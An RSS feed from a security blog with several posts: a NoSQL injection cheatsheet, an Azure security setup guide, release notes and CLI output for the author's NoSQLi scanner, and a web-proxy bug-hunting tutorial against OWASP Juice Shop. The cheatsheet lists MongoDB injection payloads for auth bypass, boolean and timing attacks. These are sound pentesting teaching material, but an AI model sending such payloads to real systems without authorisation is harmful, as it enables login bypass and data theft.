<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Null Sweep]]></title><description><![CDATA[Continuous Security, DevOps, and DevSecOps]]></description><link>https://nullsweep.com/</link><generator>Ghost 5.75</generator><lastBuildDate>Mon, 20 Apr 2026 14:47:23 GMT</lastBuildDate><atom:link href="https://nullsweep.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[NoSql Injection Cheatsheet]]></title><description><![CDATA[Learn how NoSQL Injection works, with example strings to inject to test for injections.]]></description><link>https://nullsweep.com/nosql-injection-cheatsheet/</link><guid isPermaLink="false">6089cdaed640d404fe9fe8cf</guid><category><![CDATA[nosqli]]></category><category><![CDATA[Technical Guides]]></category><category><![CDATA[Pentesting]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Mon, 07 Jun 2021 21:14:32 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1614225678583-5da4476ebbc6?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDR8fGluamVjdGlvbnxlbnwwfHx8fDE2MjMwOTk4Nzg&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1614225678583-5da4476ebbc6?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDR8fGluamVjdGlvbnxlbnwwfHx8fDE2MjMwOTk4Nzg&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="NoSql Injection Cheatsheet"><p>I was recently discussing how to exploit NoSQL vulnerabilities with a bug bounty tester who had successfully used my <a href="https://github.com/Charlie-belmer/nosqli?ref=nullsweep.com">NoSQLi</a> program to find a vulnerability on a major site (and received a $3k bounty!). </p><p>Using the scan tool is a great way to find some injectable strings, but to extract data, it&apos;s important to understand the types of injections possible with NoSQL systems, and how they present. For a instructions on setting up a test environment and introduction to NoSQLi, you can also see my post <a href="https://nullsweep.com/a-nosql-injection-primer-with-mongo/">A NoSQL Injection Primer</a></p><p>In this post, I&apos;ll walk through the various ways that you might determine if injections are possible, focusing primarily on the most popular NoSQL database, Mongo. From simplest to hardest:</p><ul><li>Error based injection (when the server returns a clear NoSQL error)</li><li>Blind boolean based injection (When the server evaluates a statement as true or false)</li><li>Timing Injections.</li></ul><h2 id="where-how-to-inject-payloads">Where &amp; How to Inject Payloads</h2><p>Anywhere you might expect to see SQL injection, you can potentially find nosql injection. consider URL parameters, POST parameters, and even sometimes HTTP headers.</p><p>GET requests can often be typed into the browser directly by adding nosql into the URL directly:</p><pre><code>1. site.com/page?query=term || &apos;1&apos;==&apos;1
2. site.com/page?user[$ne]=nobody</code></pre><p>POST requests generally need to be intercepted and modified, as NoSQL often includes JSON object structures.</p><pre><code class="language-JSON">1. {&quot;username&quot;: &quot;user&quot;, &quot;password&quot;: &quot;pass&quot;} 
	would change to 
{&quot;username&quot;: {&quot;ne&quot;: &quot;fakeuser&quot;}, password: &quot;pass&quot;}
2. {&quot;$where&quot;:  &quot;return true&quot;}</code></pre><p>Each NoSQL system may have it&apos;s own syntax, but mongo allows for both JSON (Technically BSON, but that generally happens under the hood server side) and JavaScript. JS can run directly in the Mongo server if passed through functions that allow it, and JS is enabled on the server (it is enabled by default).</p><p>If you already understand SQL injection, the concepts here are mostly the same, and only the details differ.</p><h2 id="simple-error-based-nosql-injection-tests">Simple Error Based NoSQL Injection Tests</h2><p>The simplest way to determine if injection is possible is to input some special noSQL characters, and see if the server returns an error. This might be a full error string indicating the NoSQL database in use, or something like a 500 error. </p><pre><code class="language-nosql">&apos;&quot;\/$[].&gt;</code></pre><ul><li>Plug this string into each GET parameter to see if an error occurs</li><li>Replace elements in posted JSON contents with these special characters, or NoSQL keywords like $ne, $eq, $where, $or, etc to see if there are errors.</li><li>Send additional objects along with valid JSON. For instance <code>{&quot;user&quot;: &quot;nullsweep&quot;}</code> could become <code>{&quot;user&quot;: [&quot;nullsweep&quot;, &quot;foo&quot;]}</code> or <code>{&quot;$or&quot;: [{&quot;user&quot;: &quot;foo&quot;}, {&quot;user&quot;: &quot;realuser&quot;}]}</code></li></ul><p>Some of these characters may also trigger other injection vulnerabilities (JS injection, SQL injection, shell injection, etc), so further testing may be needed to ensure it is a NoSQL backend.</p><h2 id="blind-boolean-injection">Blind Boolean Injection</h2><p>If sending special characters doesn&apos;t cause the site to send error information, it may still be possible to find an injection by sending boolean expressions (a true or false result) if the page changes depending on the answer. For instance, a product page with a product ID parameter that is injectable may return product details for one query, but a product not found message otherwise. </p><p>A backend query that is looking up a product by doing something like &quot;id = $id&quot; might use a query like <code>db.product.find( {&quot;id&quot;: 5} )</code>. Ideally, we would want to control the whole query to inject something always false such as <code>db.product.find( {&quot;$and&quot;: [ {&quot;id&quot;: 5}, {&quot;id&quot;: 6} ]</code>. It isn&apos;t always possible to inject operators like <code>$and</code> and <code>$or</code> because the operators preceed the field labels.</p><p>Instead, we may have to try a few different things. We could try to make the query match everything but the ID 5: <code>db.product.find( {&quot;id&quot;: {&quot;$ne&quot;: 5} } )</code> or use the <code>$in</code> or <code>$nin</code> operators such as <code>db.product.find( {&quot;id&quot;: {&quot;$in&quot;: []} })</code> to ensure returning no data.</p><p>If the injection is successful, you will see a difference between the &apos;true&apos; version and &apos;false&apos; version. </p><h3 id="the-boolean-injection-cheatsheet-">The Boolean Injection Cheatsheet:</h3><ul><li><code>{&quot;$ne&quot;: -1}</code></li><li><code>{&quot;$in&quot;: []}</code></li><li><code>{&quot;$and&quot;: [ {&quot;id&quot;: 5}, {&quot;id&quot;: 6} ]}</code> </li><li><code>{&quot;$where&quot;: &#xA0;&quot;return true&quot;}</code></li><li><code>{&quot;$or&quot;: [{},{&quot;foo&quot;:&quot;1&quot;}]}</code></li><li><code>site.com/page?query=term || &apos;1&apos;==&apos;1</code></li><li><code>site.com/page?user[$ne]=nobody</code></li><li><code>site.com/page?user=;return true</code></li></ul><p>You may need to try appending certain characters to correctly terminate the query:</p><ul><li>//</li><li>%00</li><li>&apos;</li><li>&quot;</li><li>some number of closing brackets or braces, in some combination</li></ul><h2 id="timing-based-injection">Timing Based Injection</h2><p>Sometimes, even when injection is possible and the attacker has sent valid true and false values, the page response is identical, and it can&apos;t be determined if an injection was successful or not.</p><p>In these cases, we can still try to determine if an injection takes place by asking the NoSQL instance to pause for a period of time before returning results, and detecting the resulting difference in time as the proof of successful injection. Timing injection is identical to blind boolean injection, except instead of trying to get the page to return <code>true</code> or <code>false</code> values, we try to get the page the load more slowly (for true) or quickly (for false).</p><p>You will likely need several page loads to gather baseline timing information before beginning the injection. The longer sleep times used in this injection type, the easier it is to spot in the results, but the longer it will take to gather information.</p><p>Timing injections are only possible where JS can be executed in the database, and can lead to other interesting attacks.</p><h3 id="timing-nosql-injection-cheatsheet-">Timing NoSql Injection Cheatsheet:</h3><ul><li><code>{&quot;$where&quot;: &#xA0;&quot;sleep(100)&quot;}</code></li><li><code>;sleep(100);</code></li></ul><h2 id="nosql-injection-limitations">NoSQL Injection Limitations</h2><p>Unlike SQL injection, finding that a site is injectable may not give unfettered access to the data. How the injection presents may allow full control over the backend, or limited querying ability on a single schema. Because records don&apos;t follow a common structure, discovering the structure can prove an additional challenge when exploiting these types of vulnerabilities.</p><p>To automate finding all of these things, check out <a href="https://github.com/Charlie-belmer/nosqli?ref=nullsweep.com">NoSQLi</a></p><p>Happy Hunting!</p>]]></content:encoded></item><item><title><![CDATA[Azure Security Architecture]]></title><description><![CDATA[<p>In this article, I will walk through configuring and setting up all the Azure services needed to secure your account. There are many services available, but it can be difficult to understand what needs to be done to actually get protected and ensure that all assets are covered.</p><p>This is</p>]]></description><link>https://nullsweep.com/azure-security-architecture/</link><guid isPermaLink="false">600c02c5b189ab0511821656</guid><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 02 Feb 2021 14:31:58 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2021/01/azure_security_architecutre-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2021/01/azure_security_architecutre-1.png" alt="Azure Security Architecture"><p>In this article, I will walk through configuring and setting up all the Azure services needed to secure your account. There are many services available, but it can be difficult to understand what needs to be done to actually get protected and ensure that all assets are covered.</p><p>This is a broad topic, with a lot of nuance, so I will focus on the exact Azure services needed for a security program, and how to get started using them. Azure was built with security in mind, so compared to my articles on configuring <a href="https://nullsweep.com/advanced-aws-security-architecture/">AWS security</a>, this is much more straightforward. I have found that Azure generally makes it easier to achieve strong security.</p><p>Setting up a solid cloud security program generally consists of a few key components:</p><ul><li>Centralize logs from all cloud resources, and make sure they are stored in perpetuity (for investigations as needed, ideally in low cost long term storage)</li><li>Monitor the logs for suspicious events, and alert into your SIEM</li><li>Configure automated configuration enforcement for the environment, so that teams can&apos;t make security mistakes (like deploying a database to listen for connections from anywhere)</li></ul><p>To Achieve all of the above, we&apos;ll be leveraging the following services:</p><ul><li>Log Analytics to gather logs from our services</li><li>Security Center for best practices (assets and subscriptions)</li><li>Defender for automated threat analysis and indicators of compromise.</li><li>Azure Sentinel for our SIEM (but you can integrate it with your existing SIEM as well)</li><li>Azure Policy for security governance.</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2021/01/azure_security_architecutre.png" class="kg-image" alt="Azure Security Architecture" loading="lazy" width="1461" height="592" srcset="https://nullsweep.com/content/images/size/w600/2021/01/azure_security_architecutre.png 600w, https://nullsweep.com/content/images/size/w1000/2021/01/azure_security_architecutre.png 1000w, https://nullsweep.com/content/images/2021/01/azure_security_architecutre.png 1461w" sizes="(min-width: 720px) 720px"><figcaption>Azure Security Architecture</figcaption></figure><p>That&apos;s a lot! Thankfully, most of this is pretty easy to configure. Let&apos;s jump in!</p><h2 id="centralizing-logs-with-log-analytics">Centralizing Logs with Log Analytics</h2><p>Your operations team may already be collecting logs and alerting based on performance metrics. We just need to ensure that the logs we care about are also being ingested. In particular you may want to look at your AD logs, server syslogs, and any security product logs you have deployed.</p><p>To configure Log Analytics, log into the Azure Portal, and create a new Log Analytics Workspace. You could create a template here, but using the web interface is simple enough, since you are unlikely to create many of these resources. Allow Azure to deploy the instance, and once deployed, you can automatically connect assets to your analytics instance.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2021/01/Azure-Log-Analytics-Setup.png" class="kg-image" alt="Azure Security Architecture" loading="lazy" width="2000" height="818" srcset="https://nullsweep.com/content/images/size/w600/2021/01/Azure-Log-Analytics-Setup.png 600w, https://nullsweep.com/content/images/size/w1000/2021/01/Azure-Log-Analytics-Setup.png 1000w, https://nullsweep.com/content/images/size/w1600/2021/01/Azure-Log-Analytics-Setup.png 1600w, https://nullsweep.com/content/images/size/w2400/2021/01/Azure-Log-Analytics-Setup.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>Azure Log Analytics Connection Setup</figcaption></figure><p>Log Analytics has a cost - both based on ingestion and total storage used. In addition, the maximum retention time for logs is 2 years, which may not be enough for all organizations. I recommend saving security sensitive logs as long as possible, in case they are needed in future investigations. There is a <a href="https://techcommunity.microsoft.com/t5/azure-sentinel/move-your-azure-sentinel-logs-to-long-term-storage-with-ease/ba-p/1407153?ref=nullsweep.com">great write up (and playbook) on how to configure this by Microsoft</a>.</p><h2 id="setup-security-center-defender">Setup Security Center &amp; Defender</h2><p>With logs being aggregated, we are now ready to setup security center. You&apos;ll need a role with Security Admin access to setup and configure everything. </p><p>To fully utilize security center, you&apos;ll also need the Azure monitoring agent deployed to assets. Security Center will show you un-monitored assets, and deploying agents can be done from within the asset control panel in most cases.</p><p>Security Center is helpful for finding recommendations on general cloud security health - for instance coming up with general security improvements such as full disk encryption, or comparing your deployment against security standards.</p><p>Azure will also push the cost-plus Defender service pretty hard, and attempt to sell you an upgrade. I 
recommend you do the upgrade, at least on all internet facing assets and critical system components. It is required for advanced monitoring and for out of the box
 compliance and regulatory assessments. The cost is less than similar 
functionality from other security vendors in my experience.</p><p>The first thing we&apos;ll do is add some regulatory standards to our compliance dashboard. Even if you don&apos;t have to adhere to them currently, I find that they provide a solid baseline, and Microsoft provides several out of the box. To Enable one, click the compliance box from the dashboard, then manage compliance policies, and add ones to for each subscription. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2021/01/Azure-Compliance-Configuration.png" class="kg-image" alt="Azure Security Architecture" loading="lazy" width="2000" height="1073" srcset="https://nullsweep.com/content/images/size/w600/2021/01/Azure-Compliance-Configuration.png 600w, https://nullsweep.com/content/images/size/w1000/2021/01/Azure-Compliance-Configuration.png 1000w, https://nullsweep.com/content/images/size/w1600/2021/01/Azure-Compliance-Configuration.png 1600w, https://nullsweep.com/content/images/size/w2400/2021/01/Azure-Compliance-Configuration.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>Azure Compliance configuration</figcaption></figure><p>I also suggest you craft your own, stricter policy groups for auditing. Security Center has more than 500 rules you can quickly add to a custom compliance group - everything from network rules to specifying that all servers have a particular application installed (such as a security agent). Of course, you can also write your own policies specific to your organization, but how to do that is out of scope for this post.</p><p>In the below screenshot, I have created a policy group that ensures SSH is not accessible from the internet, my machines should have Disaster Recovery configured, Linux servers should have python installed (though in reality this would more likely be things like your HIDS agent or other security software), and that Postgres has some kind of network protection.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2021/01/Azure-Custom-Policy.png" class="kg-image" alt="Azure Security Architecture" loading="lazy" width="2000" height="832" srcset="https://nullsweep.com/content/images/size/w600/2021/01/Azure-Custom-Policy.png 600w, https://nullsweep.com/content/images/size/w1000/2021/01/Azure-Custom-Policy.png 1000w, https://nullsweep.com/content/images/size/w1600/2021/01/Azure-Custom-Policy.png 1600w, https://nullsweep.com/content/images/size/w2400/2021/01/Azure-Custom-Policy.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>Azure Custom Security Policy</figcaption></figure><h2 id="setup-sentinel-for-your-siem">Setup Sentinel for your SIEM</h2><p>You may already have a SIEM that is integrated with your processes. </p><p>Start by connecting the Log Analytics instance(s) setup in the first step of this article. I won&apos;t go through all the setup steps here, because the Azure documentation already has good tutorials. Here are some to get started:</p><ul><li><a href="https://docs.microsoft.com/en-us/azure/sentinel/tutorial-monitor-your-data?ref=nullsweep.com">Setup built in workbooks</a></li><li><a href="https://docs.microsoft.com/en-us/azure/sentinel/tutorial-detect-threats-built-in?ref=nullsweep.com">Enable out of the box detection rules</a> (You can also<a href="https://docs.microsoft.com/en-us/azure/sentinel/tutorial-detect-threats-custom?ref=nullsweep.com"> create custom rules</a> if you have some proprietary or purchased rule sets)</li><li>Setup <a href="https://docs.microsoft.com/en-us/azure/sentinel/tutorial-respond-threats-playbook?ref=nullsweep.com">automated responses</a> and alerts</li></ul><p>Finally, you may want to leverage these features in Sentinel, but continue to use a different SIEM (such as splunk) for triage. Sentinel can be integrated with other systems, but you&apos;ll have to check with your SIEM vendor or setup some kind of custom data export. For splunk, they offer an <a href="https://splunkbase.splunk.com/app/4564/?ref=nullsweep.com">Azure connector</a>.</p><h2 id="conclusions-and-other-resources">Conclusions and other Resources</h2><p>Implementing these services and spending some time thinking about how to leverage them in your organization will build a solid base for an Azure security program. </p><p>You&apos;ll have aggregated logs for security analysis, at a glance compliance - both regulatory and specific to your organization, and the ability to identify and respond to threats. </p><p>From here, you can write tailored custom policies to improve the overall security posture of the organization and automate responses to commonly seen threats.</p><p>Due to the breadth of the these services, I didn&apos;t go too in depth into any single service. Here are some excellent resources for learning more:</p><ul><li><a href="https://www.youtube.com/watch?v=hTS8jXEX_88&amp;ref=nullsweep.com">John Savill&apos;s Azure Master Class - monitoring &amp; security portion</a></li><li><a href="https://www.youtube.com/watch?v=cIh_Nfl67T0&amp;list=PLlVtbbG169nGccbp8VSpAozu3w9xSQJoY&amp;index=4&amp;ref=nullsweep.com">The same master class, Governance (policies)</a></li><li><a href="https://docs.microsoft.com/en-us/azure/security/?ref=nullsweep.com">Azure security documentation</a> (It&apos;s generally good, but can be hard to link all the various pieces you will need together)</li><li><a href="https://techcommunity.microsoft.com/t5/microsoft-security-and/ct-p/MicrosoftSecurityandCompliance?ref=nullsweep.com">Azure security community</a> (tons of good articles to find) </li></ul>]]></content:encoded></item><item><title><![CDATA[NoSQLi 0.5.1 Released]]></title><description><![CDATA[My NoSQL Injection tool now scans for additional types of PHP GET injections.]]></description><link>https://nullsweep.com/nosqli-0-5-1-released/</link><guid isPermaLink="false">5fd350eaa914eb05178f73af</guid><category><![CDATA[Tools]]></category><category><![CDATA[nosqli]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Thu, 31 Dec 2020 12:20:41 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/12/NoSQLi.png" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/12/NoSQLi.png" alt="NoSQLi 0.5.1 Released"><p>The next Alpha release for NoSQLi is ready for use! This version brings a few minor bug fixes and performance enhancements to existing scans. The primary new feature is the addition of certain PHP GET parameter injections.</p><p>This means that nosqli now has all the planned injection type detection completed - PHP GET, error based injection, boolean injection, blind boolean injection, and timing based boolean injection tests.</p><h2 id="what-are-php-get-injections">What are PHP GET injections?</h2><p>In PHP, using brackets in a get parameter converts it into an array. For instance, a normal expected submission for a some parameter might be something like <code>vulnerablesite.com/checkorder?id=12345</code>. When the PHP script retrieves this value, it sees a string containing the expected &quot;12345&quot; value. </p><p>However, we could instead modify the URL to something like <code>vulnerablesite.com/checkorder?id[$gt]=12345</code>. The added brackets will convert this value from a string into an array. The same PHP retrieval code will now return an array instead of a string: <code>array { &#xA0;[&quot;$gt&quot;]=&gt; &quot;something&quot;}</code>.</p><p>If this is being passed without proper checking directly into mongo, we have achieved an injection, and can query the database using logic operators like not-equal, less-than, etc. In the example above, the query is modified from <code>array { [&quot;id&quot;] =&gt; &quot;12345&quot; }</code> to <code>array { [&quot;id&quot;] =&gt; array{ [&quot;$gt&quot;]=&gt; &quot;12345&quot; } }</code>, and mongo will read that value array as a search for id&apos;s greater than 12345.</p><h2 id="so-what-exactly-is-new-in-this-version">So what exactly is new in this version?</h2><p>In previous versions, nosqli checked only [$regex] values for injection, and might have caught others if the server was returning MongoDB errors when special characters were tested.</p><p>In the latest version, it now explicitly checks for all of these PHP GET injection types for all parameters on a page. It is smart enough to check each parameter alone, and with others (in the case where one parameter is dependant on the value in another)</p><p>Grab the <a href="https://github.com/Charlie-belmer/nosqli/releases/tag/v0.5.1?ref=nullsweep.com">latest release</a> on <a href="https://github.com/Charlie-belmer/nosqli?ref=nullsweep.com">github</a>, take it for a spin, and see what you can find!</p>]]></content:encoded></item><item><title><![CDATA[Security Bug Hunting with Proxies]]></title><description><![CDATA[How to find security bugs and privacy violations using attack proxies. An introduction.]]></description><link>https://nullsweep.com/security-bug-hunting-with-proxies/</link><guid isPermaLink="false">5faef78d34e139245355875b</guid><category><![CDATA[Pentesting]]></category><category><![CDATA[Technical Guides]]></category><category><![CDATA[Tools]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 17 Nov 2020 01:47:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1558639586-b55001b6f8ab?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1558639586-b55001b6f8ab?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="Security Bug Hunting with Proxies"><p>When hunting security issues or checking applications for potential privacy violations, the first tool I reach for is a web proxy. I frequently get asked about the tools I screenshot in these posts, and asked about my process, so I decided to share the basic steps I take to test a web application for security or privacy issues. </p><p>This information is targeted at someone with basic knowledge of the HTTP protocol and how the web works. It also assumes familiarity with common website vulnerability classes like the <a href="https://owasp.org/www-project-top-ten/?ref=nullsweep.com">OWASP top 10</a>. Some programming helps too, but isn&apos;t required.</p><h2 id="web-attack-proxies">Web Attack Proxies</h2><p>When I first started in web app security, I just used my browser and the developer console for all testing. This can work, but sure makes it a lot harder to find and exploit vulnerabilities!</p><p>Web attack proxies are configured to be an intermediary between your browser and the target site, capturing all requests and responses made between you and the site. This let&apos;s you quickly inspect data flows, modify data in flight, and automate tests or other tasks. They also typically include a ton of other advanced features, like decoding or encoding data, passive and active vulnerability scans, and more. I&apos;ll only touch the surface of these options today, but once you start using a proxy it&apos;s easy to learn more!</p><p>There are three that I use on a regular basis:</p><ul><li><a href="https://portswigger.net/burp?ref=nullsweep.com">Burp Suite</a>: The industry standard. The community version is limited in many ways, but is still excellent software. This is my normal go-to proxy.</li><li><a href="https://www.zaproxy.org/?ref=nullsweep.com">OWASP ZAP</a>: Fully open source, with many of the same features as Burp. Sometimes it&apos;s even ahead in some areas. </li><li><a href="https://mitmproxy.org/?ref=nullsweep.com">mitmproxy</a>: I&apos;ve been trying to do more of my proxy work in mitmproxy lately. It&apos;s very automateable and fully open source.</li></ul><h2 id="using-burpsuite">Using BurpSuite</h2><p>Let&apos;s start with Burp. It&apos;s pretty easy to use and beginner friendly, without sacrificing advanced features. Download it via the link above and fire it up. Once it opens, click through to a temporary project and select the &quot;proxy&quot; tab. </p><p>You can configure your normal browser to use Burp, by setting the proxy to localhost:8080 and installing the generated Burp certificates (downloaded by navigating in that same browser to localhost:8080), but burp includes a built in chromium browser all setup correctly. I&apos;d start by clicking the &quot;intercept is on&quot; button to disable intercept (it will pause all connections while you inspect the traffic, making the browser appear to be frozen) and then click open browser.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/11/burp_proxy_screen.png" class="kg-image" alt="Security Bug Hunting with Proxies" loading="lazy"><figcaption>Burp proxy screen</figcaption></figure><p>Now, lets try attacking the vulnerable OWASP application Juice shop. Open <a href="https://juice-shop.herokuapp.com/?ref=nullsweep.com#/">https://juice-shop.herokuapp.com/#/</a> in the burp browser.</p><h2 id="reconnaissance">Reconnaissance</h2><p>The first step in bug hunting is understanding the application you are testing, and where it might have weaknesses. Normally, I browse around a site clicking various links and looking for areas that look interesting. A few things I immediately check out:</p><ul><li>Login forms or any kind of authentication flow.</li><li>Any forms I can submit (feedback, lead generation, etc). I submit every form with some valid test data so I can store the request in the proxy.</li><li>Any link that gives any kind of error (401/Unauthorized can be interesting to look for auth bypass, 500 server errors might indicate something exploitable, etc).</li><li>Any URL that looks like it might have a unique ID in it - thing like site/product/1 or product?id=1 in the URL.</li><li>Any page that includes data submitted in the URL or a request on the page, or includes something that looks like a filename or url. Something like view?file=thefile.txt</li></ul><p>I&apos;ll sometimes also spin up a scan like dirbuster if the site allows automated tools, but they can be pretty heavy sometimes. A few files to check for manually:</p><ul><li>.git directories</li><li>.htaccess files</li><li>robots.txt and anything interesting in it</li><li>If you know the software stack, configuration files for that stack.</li></ul><p>While looking around the site, if something looks particularly interesting, I may dive right into testing. Definitely take note of anything you want to return to.</p><p>As you have browsed around in the Burp browser, your &quot;target&quot; tab has been filling up with every page visited (request &amp; response is saved) and the proxy-&gt;HTTP History has been also keeping every request in order.</p><h2 id="finding-exploiting-a-vulnerability">Finding &amp; Exploiting a Vulnerability</h2><p>Juice shop is full of vulnerabilities, so you should find plenty to play with. I&apos;ll start right into the authentication flow, and submit some fake username to log the request in the proxy. </p><p>Juice Shop is interesting in that every request isn&apos;t stored in the target tab - so for the login form I have to look at the HTTP request history, since I didn&apos;t see the post request where I was expecting. </p><p>In the below gif, you can see me find the login request, move to the repeater tool, run the request again with normal input, then with some special characters, revealing an error message that indicated SQL injection might be possible.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/11/Juice_shop_sqli.gif" class="kg-image" alt="Security Bug Hunting with Proxies" loading="lazy" width="2479" height="1380"><figcaption>Finding a SQLi vulnerability in Juice Shop</figcaption></figure><p>It won&apos;t always be so simple - in this case we see a SQL error message clearly. It might also have presented exactly the same information as before (invalid user) while still being vulnerable. Usually, I would probe the form with several different inputs looking for variances in the response before moving on.</p><p>Keep in mind that a form like this can have more than just a SQL back end. A key part of testing is forming a mental model of the various technologies in use on the back end, and how they fit together. SQL is pretty common, but I have also seen noSQL (mongo), XML, file system, even network requests from a form like this. Each will have a different attack surface.</p><h2 id="let-s-do-the-same-thing-but-with-mitmproxy">Let&apos;s do the same thing, but with mitmproxy</h2><p>If we wanted to automate the above tests in some way, or do any kind of brute forcing, we would need to upgrade to Burp Pro (which is worth it!). But we could also use a different proxy. ZAP works pretty similarly to burp, but mitmproxy looks a little different. Here&apos;s the same flow in mitmproxy:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/11/mitmproxy_sqli.gif" class="kg-image" alt="Security Bug Hunting with Proxies" loading="lazy" width="2303" height="935"><figcaption>Finding the same bug with mitmproxy</figcaption></figure><p>Mitmproxy requires a little extra setup - you&apos;ll need to install their CA cert into the browser you are using by navigating to mitm.it once you have the proxy configured in your browser.</p><p>It&apos;s a little harder to follow, because most interaction is with the keyboard. mitmproxy mostly follows vim keybindings. <code>r</code> replay&apos;s the request, <code>e</code> enters the editor, and the arrow keys or <code>q</code> navigate between screens.</p><h2 id="finding-privacy-violations">Finding Privacy Violations</h2><p>When testing for privacy issues in applications, the setup is the same: configure the application (or the entire machine) to put all network requests through the proxy. Use the application normally for a while, and monitor the flows.</p><p>This won&apos;t work as well if the application doesn&apos;t use the HTTP protocol (in which case, network monitoring tools or injecting into the process are required), but I find almost all applications use HTTP primarily.</p><p>As you use different functionality in the application or tool, watch the network requests and read through the request and response data carefully. Check URL parameters, cookie information, and data in the request headers and POST data. </p><p>This is often where decoding tools come in. Common encodings I have seen (where tools try to hide their privacy violating practices) are base64, Hex, and URL encoding. Noticing what action generates what request can give a hint as to what data is being sent.</p><h2 id="conclusions">Conclusions</h2><p>And that&apos;s the basic workflow! Of course, there are many tools that help with finding specific classes of bugs, or help inspect particular tech stacks, or automate particular tests. I think that when first starting to hunt security bugs, it&apos;s good to understand how to do it manually, then move on to the more powerful tools to automate away the repetitive tasks you find yourself doing.</p><p>What other tools and methods do you like when bug hunting?</p>]]></content:encoded></item><item><title><![CDATA[NoSQLi - A Fast NoSQL Injection Scanner]]></title><description><![CDATA[NoSQLi is a CLI tool for testing NoSQL Databases, particularly MongoDB. It is very fast, simple to use, and easy to automate.]]></description><link>https://nullsweep.com/nosqli-a-fast-nosql-injection-framework/</link><guid isPermaLink="false">5f6a931134e13924535586dd</guid><category><![CDATA[Tools]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Thu, 24 Sep 2020 10:11:49 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/09/NoSQLi.png" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/09/NoSQLi.png" alt="NoSQLi - A Fast NoSQL Injection Scanner"><p>Last year, I started working on a NoSQL injection framework, because I just didn&apos;t find a tool that suited my purposes. Other tools are too hard to automate in my workflow, or missed a lot of the simple test cases I tried.</p><p>So I developed <a href="https://github.com/Charlie-belmer/nosqli?ref=nullsweep.com">nosqli</a>, an open source NoSQL scanner written in Go. It&apos;s configurable with command line options, and runs a large number of injection attempts against targets. It&apos;s mostly focused on Mongo injections, but does work to a lesser extent against any database that uses JavaScript.</p><!--kg-card-begin: markdown--><pre><code class="language-bash">$ nosqli
NoSQLInjector is a CLI tool for testing Datastores that 
do not depend on SQL as a query language. 

nosqli aims to be a simple automation tool for identifying and exploiting 
NoSQL Injection vectors.

Usage:
  nosqli [command]

Available Commands:
  help        Help about any command
  scan        Scan endpoint for NoSQL Injection vectors
  version     Prints the current version

Flags:
      --config string       config file (default is $HOME/.nosqli.yaml)
  -d, --data string         Specify default post data (should not include any injection strings)
  -h, --help                help for nosqli
  -p, --proxy string        Proxy requests through this proxy URL. Defaults to HTTP_PROXY environment variable.
  -r, --request string      Load in a request from a file, such as a request generated in Burp or ZAP.
  -t, --target string       target url eg. http://site.com/page?arg=1
  -u, --user-agent string   Specify a user agent

Use &quot;nosqli [command] --help&quot; for more information about a command.

$ nosqli scan -t http://localhost:4000/user/lookup?username=test
Running Error based scan...
Running Boolean based scan...
Found Error based NoSQL Injection:
  URL: http://localhost:4000/user/lookup?=&amp;username=test
  param: username
  Injection: username=&apos;
</code></pre>
